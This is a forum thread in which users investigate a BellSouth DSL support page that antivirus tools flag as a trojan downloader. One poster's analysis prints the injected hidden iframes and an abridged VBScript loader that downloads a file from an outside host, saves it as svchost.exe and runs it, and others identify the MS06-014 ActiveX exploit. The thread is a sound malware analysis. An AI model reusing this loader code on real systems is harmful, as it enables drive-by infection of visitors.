n2qew
Premium
join:2004-08-22
Leland, NC
1 edit | Bellsouth Support page Virus infected
This morning I went to the Bellsouth DSL support page and clicked on "Network Status". After selecting my location, I got Virus warning from Symantec AV indicating HKER_1~1.HTM is a downloader trojan. I tried it again at work, and McAffee gave similar results. Attempts to get the third world support at Bellsouth/The New AT&T support resulted in them explaining that they "didn't handle web issues". Great answer!
If you want to see for yourself (make sure your AV is active first) either go directly to the link below, or start at www.bellsouth.net -> Help and tech support (top right) - network status (top right) -> pick any city for status. You should get an AV warning at this point.
hxxp://home.bellsouth.net/csbellsouth/s/s.dll?spage=cg/sys/networkstatus_homepage.htm&usertype=DSL |
|
redxii
too big to fail
Premium,Mod
join:2001-02-26
Texas
Host:
/dev/null
Broadband Tweaks
Suddenlink
ISDN
Fiber Optic
4 edits | Looks suspicious to me. The ActiveX control is C:\Program Files\Common Files\System\msadc\msadco.dll. Some Google references:
»support.microsoft.com/kb/329414
»www.microsoft.com/technet/securi···014.mspx
»www.microsoft.com/technet/securi···009.mspx
Allowing the ActiveX control doesn't do anything.. admin or non-admin. |
|
SpannerITWks
Premium
join:2005-04-22
| reply to n2qew
Test |
Spanner |
|
Howyoudoing
@swbell.net | reply to n2qew
This required JS to be enabled.
My AV says it's a virus Exploit.JS.ADODB.Stream.k
Is this a virus or spyware? |
|
Mele20
Premium
join:2001-06-05
Hilo, HI
1 edit | reply to SpannerITWks
Has it been fixed? I just went there and I have Avira Personal Premium that updated about 5 minutes ago and nothing happened.
edit: java script is enabled on Fx but maybe Proxo blocked it. |
|
redxii
too big to fail
Premium,Mod
join:2001-02-26
Texas
Host:
/dev/null
Broadband Tweaks
Suddenlink
ISDN
Fiber Optic
| It's an ActiveX exploit. Given the CLSID in the code, it is for MS06-014.
Firefox isn't affected anyway. IE7 requires the user to allow the control, but if one has IE7 it would be hard to believe that they haven't been keeping up with patching since longer than February 2006. |
|
mysec
Premium
join:2005-11-29
1 edit | reply to n2qew
This exploit used two different methods to download test.htm.
Code from the bellsouth page: iframe downloads two *.html files
<!-- This is the main "body" cell of the system status page. -->
.......<snip>.....
<iframe src=http://www.goldunix.com/xiao/index.htm widht=0 height=0></iframe>
<iframe src=http://www.goldunix.com/hker.htm widht=0 height=0></iframe>
File 1: index.html - downloads mm1.html
<frame src="mm1.htm"
frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
</frameset>
mm1.html: downloads a .chm file which calls out to download test.htm, which turns out to be an executable:
<SCRIPT language=JavaScript>
var url =document.location.href;
url=url.substring(0, url.lastIndexOf('/'));
var mhStr='mk:'+'@MSI'+'TStor'+'e:mhtml'+':
c:'+'\\'+'\\'+'.mht!';
document.write( '<OBJECT Width = 0 Height = 0 style="display:none;"
type ="text/x-scriptlet" data="' + mhStr + url + '/test.chm::/test.htm"></OBJECT>');
window.status = " ";
</SCRIPT>
....snip.....
/$WWKeywordLinks/Property�½;|‚" /test.exe�…� /test.htm
___________________________________________________________
File 2: hker.htm - does two things,
1) downloads test.htm
2) sets up to create svchost.exe
<script language="VBScript">
on error resume next
dl = "http://www.goldunix.com/test.htm"
.....<snip>......
x.Send
fname1="svchost.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
S.open
fname1= F.BuildPath(tmp,fname1)
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
<head>
<title>Hello!!!</title>
Both actions are blocked:
_____________________________________________________________
Letting the exploit run: it copies itself as svchost.exe into c:..\temp (typical malware action)
_____________________________________________________________
svchost.exe is the downloader and attempts to connect to the internet:
_____________________________________________________________
Scans of both test.htm and svchost.exe reveal they are the same file:
_____________________________________________________________
_____________________________________________________________
Same old tricks attempting to install a trojan.
regards,
-rich
______________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier |
|
Howyoudoing
@sbcglobal.net |  Nice! |
|
Howyoudoing
@sbcglobal.net
| reply to n2qew
said by n2qew  :I tried it again at work, and McAffee gave similar results. Your boss must be very proud  lol |
|
jazzman916
Life on the Upbeat
Premium,Mod
join:2001-09-01
Birdland
clubs: | reply to n2qew
Has also been discussed here: »BellSouth Network Status page gives Norton AntiVirus alert! |
|
mysec
Premium
join:2005-11-29
| reply to redxii
said by redxii : IE7 requires the user to allow the control,...
IE6 also prompts, if *prompt* is enabled in Options.
But this brings up an interesting point: if you are a Bell south user and you are checking your service status on this page, wouldn't you allow the control, since it is a *legitimate* site?
Or if it were a javascript alert, you might conclude that js is required for the site, as it is on many sites.
quote:
but if one has IE7 it would be hard to believe that they haven't been keeping up with patching since longer than February 2006.
Since infected sites employing remote code execution continue to use these old exploits, there must be enough people out there *not patched, or it would not continue to be profitable to use them.
regards,
-rich
______________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier |
|
Howyoudoing
@sbcglobal.net
| said by mysec :But this brings up an interesting point: if you are a Bell south user and you are checking your service status on this page, wouldn't you allow the control, since it is a *legitimate* site? I believe that's a yes.
said by mysec :Or if it were a javascript alert, you might conclude that js is required for the site, as it is on many sites. Yes also.
I'm sure you knew this already . Yes interesting and here's where security layers come into play and save the day.
By trusting a legitimate site i take a layer away (enable JS) but there's layer AV keeping an eye open. If i didn't have layer AV there's layer PG and so on. |
|
SpannerITWks
Premium
join:2005-04-22
| reply to n2qew
Mele20
No it hasn't, i just checked and i get the same 3 warnings in quick succession from AntiVir ! These are related to the code etc on the page that's in the screenies RedXII1234 posted.
mysec
I had Scripting etc in IE6 disabled, as usual.
Spanner
--
I Only Know What I Know, But I'm Learning all The Time - Stay Safe - Spanner intheWorks
/SpannerITWks |
|
Mele20
Premium
join:2001-06-05
Hilo, HI | I switched to IE6 and bypassed Proxo. Allowed Scripting and ActiveX. I chose a city, etc. Avira does not alert. |
|
exocet_cm
I am the law
Premium
join:2003-03-23
New Orleans, LA
clubs:  | reply to mysec
Uh oh!  |
|
n2qew
Premium
join:2004-08-22
Leland, NC
| reply to Howyoudoing
said by Howyoudoing :said by n2qew :I tried it again at work, and McAffee gave similar results. Your boss must be very proud lol Welllll,
1. She didn't know....
2. I used a barebones imaged machine that was up to date with McAffee just to see if it was a fluke with my machine, and/or a false from Symantec AV. If it kilt it, reimaging it wouldn't be a problem. It was also on the hot side of the firewall.
Anyway, with the work others have done, it appears that the AV pops are valid. Bellsouth has no path by which to report this. I've tried several times - even had one of their "customer surveys" to rate their performance on my answering machine when I got home Today. I answered with all "4"'s (and that ain't 4 stars, either). |
|
mysec
Premium
join:2005-11-29
| reply to Mele20
said by Mele20 :Avira does not alert.
Neither do some others, although it's changing.
See here for scans of all of the files:
»urs2.net/rsj/computing/tests/bellsouth/scans
regards,
-rich
______________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier |
|
Mele20
Premium
join:2001-06-05
Hilo, HI | Avira has been alerting for Spanner for some time so I don't understand why you screenshots from Jotti's don't show Avira alerting until very recently. I don't know why Avira alerts for Spanner and not me. |
|
mysec
Premium
join:2005-11-29 | I don't see Avira on Jotti's list.
-rich |
|
Mele20
Premium
join:2001-06-05
Hilo, HI | I thought I saw avira detecting on your later screenshots...those were all Jotti weren't they?
So, am I infected since Avira doesn't detect anything? |
|
